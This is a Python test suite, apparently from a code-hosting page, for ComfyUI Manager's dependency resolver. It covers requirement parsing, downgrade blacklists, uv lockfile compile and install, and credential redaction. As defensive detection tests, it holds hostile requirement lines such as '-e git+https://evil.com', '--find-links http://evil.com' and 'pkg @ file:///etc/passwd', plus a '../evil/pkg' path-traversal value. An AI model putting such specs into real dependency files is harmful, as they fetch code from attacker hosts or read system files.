assert "rejected" in deps.skipped[0][1]
|
||||
|
||||
def test_path_separator_rejected(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "../evil/pkg\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert deps.requirements == []
|
||||
assert "path separator" in deps.skipped[0][1]
|
||||
|
||||
def test_backslash_rejected(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "evil\\pkg\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert deps.requirements == []
|
||||
|
||||
def test_valid_spec_with_version(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.requirements) == 1
|
||||
|
||||
def test_environment_marker_allowed(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a",
|
||||
'pywin32>=300; sys_platform=="win32"\n')
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.requirements) == 1
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# --index-url separation
|
||||
# ===========================================================================
|
||||
|
||||
class TestIndexUrlSeparation:
|
||||
def test_index_url_split(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a",
|
||||
"torch --index-url https://download.pytorch.org/whl/cu121\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.requirements) == 1
|
||||
assert deps.requirements[0].name == "torch"
|
||||
assert "https://download.pytorch.org/whl/cu121" in deps.extra_index_urls
|
||||
|
||||
def test_no_index_url(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert deps.extra_index_urls == []
|
||||
|
||||
def test_duplicate_index_urls_deduplicated(self, tmp_path):
|
||||
p1 = _make_node_pack(str(tmp_path), "pack_a",
|
||||
"torch --index-url https://example.com/whl\n")
|
||||
p2 = _make_node_pack(str(tmp_path), "pack_b",
|
||||
"torchvision --index-url https://example.com/whl\n")
|
||||
r = _resolver([p1, p2], blacklist=set())
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.extra_index_urls) == 1
|
||||
|
||||
def test_standalone_index_url_line(self, tmp_path):
|
||||
"""Standalone ``--index-url URL`` line with no package prefix."""
|
||||
p = _make_node_pack(str(tmp_path), "pack_a",
|
||||
"--index-url https://download.pytorch.org/whl/cu121\nnumpy>=1.20\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.requirements) == 1
|
||||
assert deps.requirements[0].name == "numpy"
|
||||
assert "https://download.pytorch.org/whl/cu121" in deps.extra_index_urls
|
||||
|
||||
def test_standalone_extra_index_url_line(self, tmp_path):
|
||||
"""Standalone ``--extra-index-url URL`` line must not become a package."""
|
||||
p = _make_node_pack(str(tmp_path), "pack_a",
|
||||
"--extra-index-url https://custom.pypi.org/simple\nnumpy>=1.20\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.requirements) == 1
|
||||
assert deps.requirements[0].name == "numpy"
|
||||
assert "https://custom.pypi.org/simple" in deps.extra_index_urls
|
||||
|
||||
def test_extra_index_url_with_package_prefix(self, tmp_path):
|
||||
"""``package --extra-index-url URL`` splits correctly."""
|
||||
p = _make_node_pack(str(tmp_path), "pack_a",
|
||||
"torch --extra-index-url https://download.pytorch.org/whl/cu121\n")
|
||||
r = _resolver([p])
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.requirements) == 1
|
||||
assert deps.requirements[0].name == "torch"
|
||||
assert "https://download.pytorch.org/whl/cu121" in deps.extra_index_urls
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Downgrade blacklist
|
||||
# ===========================================================================
|
||||
|
||||
class TestDowngradeBlacklist:
|
||||
def setup_method(self):
|
||||
_MOCK_INSTALLED_PACKAGES.clear()
|
||||
|
||||
def test_not_in_blacklist_passes(self, tmp_path):
|
||||
_MOCK_INSTALLED_PACKAGES["numpy"] = "1.24.0"
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "numpy<=1.20\n")
|
||||
r = _resolver([p], downgrade_blacklist=["torch"])
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.requirements) == 1
|
||||
|
||||
def test_no_version_spec_installed_blocked(self, tmp_path):
|
||||
_MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "torch\n")
|
||||
r = _resolver([p], downgrade_blacklist=["torch"])
|
||||
deps = r.collect_requirements()
|
||||
assert deps.requirements == []
|
||||
assert "downgrade blacklisted" in deps.skipped[0][1]
|
||||
|
||||
def test_no_version_spec_not_installed_passes(self, tmp_path):
|
||||
# torch not installed
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "torch\n")
|
||||
r = _resolver([p], downgrade_blacklist=["torch"])
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.requirements) == 1
|
||||
|
||||
@pytest.mark.parametrize("operator,blocked", [
|
||||
("<=1.20", True), # downgrade blocked
|
||||
("==1.20", True), # exact match blocked (installed >= requested)
|
||||
("<2.0", True), # less-than blocked (installed >= requested)
|
||||
("~=1.20", True), # compatible release blocked
|
||||
(">=2.5", False), # upgrade allowed
|
||||
(">2.0", False), # greater-than allowed
|
||||
("!=1.20", False), # not-equal allowed
|
||||
])
|
||||
def test_operator_handling(self, operator, blocked, tmp_path):
|
||||
_MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", f"torch{operator}\n")
|
||||
r = _resolver([p], downgrade_blacklist=["torch"])
|
||||
deps = r.collect_requirements()
|
||||
if blocked:
|
||||
assert deps.requirements == [], f"Expected torch{operator} to be blocked"
|
||||
else:
|
||||
assert len(deps.requirements) == 1, f"Expected torch{operator} to pass"
|
||||
|
||||
def test_same_version_blocked(self, tmp_path):
|
||||
_MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "torch==2.1.0\n")
|
||||
r = _resolver([p], downgrade_blacklist=["torch"])
|
||||
deps = r.collect_requirements()
|
||||
assert deps.requirements == [] # installed >= requested → blocked
|
||||
|
||||
def test_higher_version_request_passes_eq(self, tmp_path):
|
||||
_MOCK_INSTALLED_PACKAGES["torch"] = "2.1.0"
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "torch==2.5.0\n")
|
||||
r = _resolver([p], downgrade_blacklist=["torch"])
|
||||
deps = r.collect_requirements()
|
||||
assert len(deps.requirements) == 1 # installed < requested → allowed
|
||||
|
||||
def teardown_method(self):
|
||||
_MOCK_INSTALLED_PACKAGES.clear()
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# _get_uv_cmd
|
||||
# ===========================================================================
|
||||
|
||||
class TestGetUvCmd:
|
||||
def test_module_uv(self):
|
||||
r = _resolver([])
|
||||
with mock.patch("subprocess.check_output", return_value=b"uv 0.4.0"):
|
||||
cmd = r._get_uv_cmd()
|
||||
assert cmd[-2:] == ["-m", "uv"]
|
||||
|
||||
def test_standalone_uv(self):
|
||||
r = _resolver([])
|
||||
with mock.patch("subprocess.check_output", side_effect=FileNotFoundError):
|
||||
with mock.patch("shutil.which", return_value="/usr/bin/uv"):
|
||||
cmd = r._get_uv_cmd()
|
||||
assert cmd == ["uv"]
|
||||
|
||||
def test_uv_not_available(self):
|
||||
r = _resolver([])
|
||||
with mock.patch("subprocess.check_output", side_effect=FileNotFoundError):
|
||||
with mock.patch("shutil.which", return_value=None):
|
||||
with pytest.raises(UvNotAvailableError):
|
||||
r._get_uv_cmd()
|
||||
|
||||
def test_embedded_python_uses_s_flag(self):
|
||||
r = _resolver([])
|
||||
with mock.patch("subprocess.check_output", return_value=b"uv 0.4.0"):
|
||||
with mock.patch.object(
|
||||
type(r), '_get_uv_cmd',
|
||||
wraps=r._get_uv_cmd,
|
||||
):
|
||||
# Simulate embedded python
|
||||
with mock.patch(
|
||||
"comfyui_manager.common.unified_dep_resolver.sys"
|
||||
) as mock_sys:
|
||||
mock_sys.executable = "/path/python_embeded/python.exe"
|
||||
cmd = r._get_uv_cmd()
|
||||
assert "-s" in cmd
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# compile_lockfile
|
||||
# ===========================================================================
|
||||
|
||||
class TestCompileLockfile:
|
||||
def test_success(self, tmp_path):
|
||||
r = _resolver([])
|
||||
deps = CollectedDeps(
|
||||
requirements=[PackageRequirement("numpy", "numpy>=1.20", "/pack/a")],
|
||||
)
|
||||
|
||||
lockfile_content = "numpy==1.24.0\n"
|
||||
|
||||
def fake_run(cmd, **kwargs):
|
||||
# Simulate uv writing the lockfile
|
||||
for i, arg in enumerate(cmd):
|
||||
if arg == "--output-file" and i + 1 < len(cmd):
|
||||
with open(cmd[i + 1], "w") as f:
|
||||
f.write(lockfile_content)
|
||||
return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
|
||||
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", side_effect=fake_run):
|
||||
result = r.compile_lockfile(deps)
|
||||
|
||||
assert result.success
|
||||
assert result.lockfile_path is not None
|
||||
# Clean up
|
||||
shutil.rmtree(os.path.dirname(result.lockfile_path), ignore_errors=True)
|
||||
|
||||
def test_conflict_detection(self):
|
||||
r = _resolver([])
|
||||
deps = CollectedDeps(
|
||||
requirements=[PackageRequirement("numpy", "numpy>=1.20", "/pack/a")],
|
||||
)
|
||||
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
|
||||
[], 1, stdout="", stderr="error: conflict between numpy and scipy"
|
||||
)):
|
||||
result = r.compile_lockfile(deps)
|
||||
|
||||
assert not result.success
|
||||
assert len(result.conflicts) > 0
|
||||
|
||||
def test_timeout(self):
|
||||
r = _resolver([])
|
||||
deps = CollectedDeps(
|
||||
requirements=[PackageRequirement("numpy", "numpy", "/pack/a")],
|
||||
)
|
||||
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", side_effect=subprocess.TimeoutExpired("uv", 300)):
|
||||
result = r.compile_lockfile(deps)
|
||||
|
||||
assert not result.success
|
||||
assert "timeout" in result.conflicts[0].lower()
|
||||
|
||||
def test_lockfile_not_created(self):
|
||||
r = _resolver([])
|
||||
deps = CollectedDeps(
|
||||
requirements=[PackageRequirement("numpy", "numpy", "/pack/a")],
|
||||
)
|
||||
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
|
||||
[], 0, stdout="", stderr=""
|
||||
)):
|
||||
result = r.compile_lockfile(deps)
|
||||
|
||||
assert not result.success
|
||||
assert "lockfile not created" in result.conflicts[0]
|
||||
|
||||
def test_extra_index_urls_passed(self, tmp_path):
|
||||
r = _resolver([])
|
||||
deps = CollectedDeps(
|
||||
requirements=[PackageRequirement("torch", "torch", "/pack/a")],
|
||||
extra_index_urls=["https://download.pytorch.org/whl/cu121"],
|
||||
)
|
||||
|
||||
captured_cmd: list[str] = []
|
||||
|
||||
def fake_run(cmd, **kwargs):
|
||||
captured_cmd.extend(cmd)
|
||||
for i, arg in enumerate(cmd):
|
||||
if arg == "--output-file" and i + 1 < len(cmd):
|
||||
with open(cmd[i + 1], "w") as f:
|
||||
f.write("torch==2.1.0\n")
|
||||
return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
|
||||
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", side_effect=fake_run):
|
||||
result = r.compile_lockfile(deps)
|
||||
|
||||
assert result.success
|
||||
assert "--extra-index-url" in captured_cmd
|
||||
assert "https://download.pytorch.org/whl/cu121" in captured_cmd
|
||||
shutil.rmtree(os.path.dirname(result.lockfile_path), ignore_errors=True)
|
||||
|
||||
def test_constraints_file_created(self, tmp_path):
|
||||
r = UnifiedDepResolver(
|
||||
node_pack_paths=[],
|
||||
base_requirements=["comfyui-core>=1.0"],
|
||||
)
|
||||
deps = CollectedDeps(
|
||||
requirements=[PackageRequirement("numpy", "numpy", "/pack/a")],
|
||||
)
|
||||
|
||||
captured_cmd: list[str] = []
|
||||
|
||||
def fake_run(cmd, **kwargs):
|
||||
captured_cmd.extend(cmd)
|
||||
for i, arg in enumerate(cmd):
|
||||
if arg == "--output-file" and i + 1 < len(cmd):
|
||||
with open(cmd[i + 1], "w") as f:
|
||||
f.write("numpy==1.24.0\n")
|
||||
return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
|
||||
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", side_effect=fake_run):
|
||||
result = r.compile_lockfile(deps)
|
||||
|
||||
assert result.success
|
||||
assert "--constraint" in captured_cmd
|
||||
shutil.rmtree(os.path.dirname(result.lockfile_path), ignore_errors=True)
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# install_from_lockfile
|
||||
# ===========================================================================
|
||||
|
||||
class TestInstallFromLockfile:
|
||||
def test_success(self, tmp_path):
|
||||
lockfile = os.path.join(str(tmp_path), "resolved.txt")
|
||||
with open(lockfile, "w") as f:
|
||||
f.write("numpy==1.24.0\n")
|
||||
|
||||
r = _resolver([])
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
|
||||
[], 0, stdout="Installed numpy-1.24.0\n", stderr=""
|
||||
)):
|
||||
result = r.install_from_lockfile(lockfile)
|
||||
|
||||
assert result.success
|
||||
assert len(result.installed) == 1
|
||||
|
||||
def test_failure(self, tmp_path):
|
||||
lockfile = os.path.join(str(tmp_path), "resolved.txt")
|
||||
with open(lockfile, "w") as f:
|
||||
f.write("nonexistent-pkg==1.0.0\n")
|
||||
|
||||
r = _resolver([])
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
|
||||
[], 1, stdout="", stderr="No matching distribution found"
|
||||
)):
|
||||
result = r.install_from_lockfile(lockfile)
|
||||
|
||||
assert not result.success
|
||||
assert result.stderr != ""
|
||||
|
||||
def test_timeout(self, tmp_path):
|
||||
lockfile = os.path.join(str(tmp_path), "resolved.txt")
|
||||
with open(lockfile, "w") as f:
|
||||
f.write("numpy==1.24.0\n")
|
||||
|
||||
r = _resolver([])
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", side_effect=subprocess.TimeoutExpired("uv", 600)):
|
||||
result = r.install_from_lockfile(lockfile)
|
||||
|
||||
assert not result.success
|
||||
assert "TimeoutExpired" in result.stderr
|
||||
|
||||
def test_atomic_failure_empty_installed(self, tmp_path):
|
||||
lockfile = os.path.join(str(tmp_path), "resolved.txt")
|
||||
with open(lockfile, "w") as f:
|
||||
f.write("broken-pkg==1.0.0\n")
|
||||
|
||||
r = _resolver([])
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
|
||||
[], 1, stdout="", stderr="error"
|
||||
)):
|
||||
result = r.install_from_lockfile(lockfile)
|
||||
|
||||
assert not result.success
|
||||
assert result.installed == []
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Credential redaction
|
||||
# ===========================================================================
|
||||
|
||||
class TestCredentialRedaction:
|
||||
def test_redact_user_pass(self):
|
||||
r = _resolver([])
|
||||
url = "https://user:pass123@pypi.example.com/simple"
|
||||
assert "user:pass123" not in r._redact_url(url)
|
||||
assert "****@" in r._redact_url(url)
|
||||
|
||||
def test_no_credentials_passthrough(self):
|
||||
r = _resolver([])
|
||||
url = "https://pypi.org/simple"
|
||||
assert r._redact_url(url) == url
|
||||
|
||||
def test_redact_pattern(self):
|
||||
assert _CREDENTIAL_PATTERN.sub('://****@', "https://a:b@host") == "https://****@host"
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# cleanup_stale_tmp
|
||||
# ===========================================================================
|
||||
|
||||
class TestCleanupStaleTmp:
|
||||
def test_removes_old_dirs(self, tmp_path):
|
||||
stale = os.path.join(str(tmp_path), f"{_TMP_PREFIX}old")
|
||||
os.makedirs(stale)
|
||||
# Make it appear old
|
||||
old_time = time.time() - 7200 # 2 hours ago
|
||||
os.utime(stale, (old_time, old_time))
|
||||
|
||||
with mock.patch("tempfile.gettempdir", return_value=str(tmp_path)):
|
||||
UnifiedDepResolver.cleanup_stale_tmp(max_age_seconds=3600)
|
||||
|
||||
assert not os.path.exists(stale)
|
||||
|
||||
def test_preserves_recent_dirs(self, tmp_path):
|
||||
recent = os.path.join(str(tmp_path), f"{_TMP_PREFIX}recent")
|
||||
os.makedirs(recent)
|
||||
|
||||
with mock.patch("tempfile.gettempdir", return_value=str(tmp_path)):
|
||||
UnifiedDepResolver.cleanup_stale_tmp(max_age_seconds=3600)
|
||||
|
||||
assert os.path.exists(recent)
|
||||
|
||||
def test_ignores_non_prefix_dirs(self, tmp_path):
|
||||
other = os.path.join(str(tmp_path), "other_dir")
|
||||
os.makedirs(other)
|
||||
old_time = time.time() - 7200
|
||||
os.utime(other, (old_time, old_time))
|
||||
|
||||
with mock.patch("tempfile.gettempdir", return_value=str(tmp_path)):
|
||||
UnifiedDepResolver.cleanup_stale_tmp(max_age_seconds=3600)
|
||||
|
||||
assert os.path.exists(other)
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Concurrency: unique temp directories
|
||||
# ===========================================================================
|
||||
|
||||
class TestConcurrency:
|
||||
def test_unique_temp_directories(self):
|
||||
"""Two resolver instances get unique temp dirs (via mkdtemp)."""
|
||||
dirs: list[str] = []
|
||||
|
||||
original_mkdtemp = tempfile.mkdtemp
|
||||
|
||||
def capturing_mkdtemp(**kwargs):
|
||||
d = original_mkdtemp(**kwargs)
|
||||
dirs.append(d)
|
||||
return d
|
||||
|
||||
r = _resolver([])
|
||||
deps = CollectedDeps(
|
||||
requirements=[PackageRequirement("numpy", "numpy", "/p")],
|
||||
)
|
||||
|
||||
def fake_run(cmd, **kwargs):
|
||||
for i, arg in enumerate(cmd):
|
||||
if arg == "--output-file" and i + 1 < len(cmd):
|
||||
with open(cmd[i + 1], "w") as f:
|
||||
f.write("numpy==1.24.0\n")
|
||||
return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
|
||||
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", side_effect=fake_run):
|
||||
with mock.patch(
|
||||
"comfyui_manager.common.unified_dep_resolver.tempfile.mkdtemp",
|
||||
side_effect=capturing_mkdtemp,
|
||||
):
|
||||
r.compile_lockfile(deps)
|
||||
r.compile_lockfile(deps)
|
||||
|
||||
assert len(dirs) == 2
|
||||
assert dirs[0] != dirs[1]
|
||||
|
||||
for d in dirs:
|
||||
shutil.rmtree(d, ignore_errors=True)
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# resolve_and_install (full pipeline)
|
||||
# ===========================================================================
|
||||
|
||||
class TestResolveAndInstall:
|
||||
def test_no_deps_returns_success(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a") # No requirements.txt
|
||||
r = _resolver([p])
|
||||
result = r.resolve_and_install()
|
||||
assert result.success
|
||||
|
||||
def test_uv_not_available_raises(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
|
||||
r = _resolver([p])
|
||||
with mock.patch.object(r, "_get_uv_cmd", side_effect=UvNotAvailableError("no uv")):
|
||||
with pytest.raises(UvNotAvailableError):
|
||||
r.resolve_and_install()
|
||||
|
||||
def test_compile_failure_returns_error(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "numpy\n")
|
||||
r = _resolver([p])
|
||||
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", return_value=subprocess.CompletedProcess(
|
||||
[], 1, stdout="", stderr="conflict error"
|
||||
)):
|
||||
result = r.resolve_and_install()
|
||||
|
||||
assert not result.success
|
||||
assert "compile failed" in result.error
|
||||
|
||||
def test_full_success_pipeline(self, tmp_path):
|
||||
p = _make_node_pack(str(tmp_path), "pack_a", "numpy>=1.20\n")
|
||||
r = _resolver([p])
|
||||
|
||||
call_count = {"compile": 0, "install": 0}
|
||||
|
||||
def fake_run(cmd, **kwargs):
|
||||
cmd_str = " ".join(cmd)
|
||||
if "compile" in cmd_str:
|
||||
call_count["compile"] += 1
|
||||
for i, arg in enumerate(cmd):
|
||||
if arg == "--output-file" and i + 1 < len(cmd):
|
||||
with open(cmd[i + 1], "w") as f:
|
||||
f.write("numpy==1.24.0\n")
|
||||
return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
|
||||
elif "install" in cmd_str:
|
||||
call_count["install"] += 1
|
||||
return subprocess.CompletedProcess(
|
||||
cmd, 0, stdout="Installed numpy-1.24.0\n", stderr=""
|
||||
)
|
||||
return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="")
|
||||
|
||||
with mock.patch.object(r, "_get_uv_cmd", return_value=["uv"]):
|
||||
with mock.patch("subprocess.run", side_effect=fake_run):
|
||||
result = r.resolve_and_install()
|
||||
|
||||
assert result.success
|
||||
assert call_count["compile"] == 1
|
||||
assert call_count["install"] == 1
|
||||
assert result.collected is not None
|
||||
assert len(result.collected.requirements) == 1
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Multiple custom_nodes paths
|
||||
# ===========================================================================
|
||||
|
||||
class TestMultiplePaths:
|
||||
def test_collection_from_multiple_paths(self, tmp_path):
|
||||
dir_a = os.path.join(str(tmp_path), "custom_nodes_a")
|
||||
dir_b = os.path.join(str(tmp_path), "custom_nodes_b")
|
||||
p1 = _make_node_pack(dir_a, "pack_1", "numpy\n")
|
||||
p2 = _make_node_pack(dir_b, "pack_2", "requests\n")
|
||||
r = _resolver([p1, p2])
|
||||
deps = r.collect_requirements()
|
||||
names = {req.name for req in deps.requirements}
|
||||
assert names == {"numpy", "requests"}
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# cm_global defensive access
|
||||
# ===========================================================================
|
||||
|
||||
class TestDefensiveAccess:
|
||||
def test_default_blacklist_is_empty_set(self):
|
||||
r = UnifiedDepResolver(node_pack_paths=[])
|
||||
assert r.blacklist == set()
|
||||
|
||||
def test_default_overrides_is_empty_dict(self):
|
||||
r = UnifiedDepResolver(node_pack_paths=[])
|
||||
assert r.overrides == {}
|
||||
|
||||
def test_default_downgrade_blacklist_is_empty_list(self):
|
||||
r = UnifiedDepResolver(node_pack_paths=[])
|
||||
assert r.downgrade_blacklist == []
|
||||
|
||||
def test_explicit_none_uses_defaults(self):
|
||||
r = UnifiedDepResolver(
|
||||
node_pack_paths=[],
|
||||
blacklist=None,
|
||||
overrides=None,
|
||||
downgrade_blacklist=None,
|
||||
)
|
||||
assert r.blacklist == set()
|
||||
assert r.overrides == {}
|
||||
assert r.downgrade_blacklist == []
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# Regex patterns
|
||||
# ===========================================================================
|
||||
|
||||
class TestPatterns:
|
||||
def test_dangerous_pattern_matches(self):
|
||||
assert _DANGEROUS_PATTERNS.match("-r secret.txt")
|
||||
assert _DANGEROUS_PATTERNS.match("--requirement secret.txt")
|
||||
assert _DANGEROUS_PATTERNS.match("-e git+https://evil.com")
|
||||
assert _DANGEROUS_PATTERNS.match("--editable ./local")
|
||||
assert _DANGEROUS_PATTERNS.match("-c constraints.txt")
|
||||
assert _DANGEROUS_PATTERNS.match("--find-links http://evil.com")
|
||||
assert _DANGEROUS_PATTERNS.match("-f http://evil.com")
|
||||
assert _DANGEROUS_PATTERNS.match("pkg @ file:///etc/passwd")
|
||||
|
||||
def test_dangerous_pattern_no_false_positive(self):
|
||||
assert _DANGEROUS_PATTERNS.match("numpy>=1.20") is None
|
||||
assert _DANGEROUS_PATTERNS.match("requests") is None
|
||||
assert _DANGEROUS_PATTERNS.match("torch --index-url https://x.com") is None
|
||||
|
||||
def test_version_spec_pattern(self):
|
||||
m = _VERSION_SPEC_PATTERN.search("torch>=2.0")
|
||||
assert m is not None
|
||||
assert m.group(1) == "torch"
|
||||
assert m.group(2) == ">="
|
||||
assert m.group(3) == "2.0"
|
||||
|
||||
def test_version_spec_no_version(self):
|
||||
m = _VERSION_SPEC_PATTERN.search("torch")
|
||||
assert m is None
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# _extract_package_name
|
||||
# ===========================================================================
|
||||
|
||||
class TestExtractPackageName:
|
||||
def test_simple_name(self):
|
||||
assert UnifiedDepResolver._extract_package_name("numpy") == "numpy"
|
||||
|
||||
def test_with_version(self):
|
||||
assert UnifiedDepResolver._extract_package_name("numpy>=1.20") == "numpy"
|
||||
|
||||
def test_normalisation(self):
|
||||
assert UnifiedDepResolver._extract_package_name("My-Package>=1.0") == "my_package"
|
||||
|
||||
def test_extras(self):
|
||||
assert UnifiedDepResolver._extract_package_name("requests[security]") == "requests"
|
||||
|
||||
def test_at_url(self):
|
||||
assert UnifiedDepResolver._extract_package_name("pkg @ https://example.com/pkg.tar.gz") == "pkg"
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# _is_disabled_path
|
||||
# ===========================================================================
|
||||
|
||||
class TestIsDisabledPath:
|
||||
def test_new_style(self):
|
||||
assert UnifiedDepResolver._is_disabled_path("/custom_nodes/.disabled/my_pack")
|
||||
|
||||
def test_old_style(self):
|
||||
assert UnifiedDepResolver._is_disabled_path("/custom_nodes/my_pack.disabled")
|
||||
|
||||
def test_normal_path(self):
|
||||
assert not UnifiedDepResolver._is_disabled_path("/custom_nodes/my_pack")
|
||||
|
||||
def test_trailing_slash(self):
|
||||
assert UnifiedDepResolver._is_disabled_path("/custom_nodes/my_pack.disabled/")
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# collect_node_pack_paths
|
||||
# ===========================================================================
|
||||
|
||||
class TestCollectNodePackPaths:
|
||||
def test_collects_subdirectories(self, tmp_path):
|
||||
base = tmp_path / "custom_nodes"
|
||||
base.mkdir()
|
||||
(base / "pack_a").mkdir()
|
||||
(base / "pack_b").mkdir()
|
||||
(base / "file.txt").touch() # not a dir — should be excluded
|
||||
result = collect_node_pack_paths([str(base)])
|
||||
names = sorted(os.path.basename(p) for p in result)
|
||||
assert names == ["pack_a", "pack_b"]
|
||||
|
||||
def test_nonexistent_base_dir(self):
|
||||
result = collect_node_pack_paths(["/nonexistent/path"])
|
||||
assert result == []
|
||||
|
||||
def test_multiple_base_dirs(self, tmp_path):
|
||||
base1 = tmp_path / "cn1"
|
||||
base2 = tmp_path / "cn2"
|
||||
base1.mkdir()
|
||||
base2.mkdir()
|
||||
(base1 / "pack_a").mkdir()
|
||||
(base2 / "pack_b").mkdir()
|
||||
result = collect_node_pack_paths([str(base1), str(base2)])
|
||||
names = sorted(os.path.basename(p) for p in result)
|
||||
assert names == ["pack_a", "pack_b"]
|
||||
|
||||
def test_empty_base_dir(self, tmp_path):
|
||||
base = tmp_path / "custom_nodes"
|
||||
base.mkdir()
|
||||
result = collect_node_pack_paths([str(base)])
|
||||
assert result == []
|
||||
|
||||
|
||||
# ===========================================================================
|
||||
# collect_base_requirements
|
||||
# ===========================================================================
|
||||
|
||||
class TestCollectBaseRequirements:
|
||||
def test_reads_both_files(self, tmp_path):
|
||||
(tmp_path / "requirements.txt").write_text("numpy>=1.20\n")
|
||||
(tmp_path / "manager_requirements.txt").write_text("requests\n")
|
||||
result = collect_base_requirements(str(tmp_path))
|
||||
assert result == ["numpy>=1.20", "requests"]
|
||||
|
||||
def test_skips_comments_and_blanks(self, tmp_path):
|
||||
(tmp_path / "requirements.txt").write_text("# comment\n\nnumpy\n \n")
|
||||
result = collect_base_requirements(str(tmp_path))
|
||||
assert result == ["numpy"]
|
||||
|
||||
def test_missing_files(self, tmp_path):
|
||||
result = collect_base_requirements(str(tmp_path))
|
||||
assert result == []
|
||||
|
||||
def test_only_requirements_txt(self, tmp_path):
|
||||
(tmp_path / "requirements.txt").write_text("torch\n")
|
||||
result = collect_base_requirements(str(tmp_path))
|
||||
assert result == ["torch"]
|
||||
Loading…
Reference in New Issue
Block a user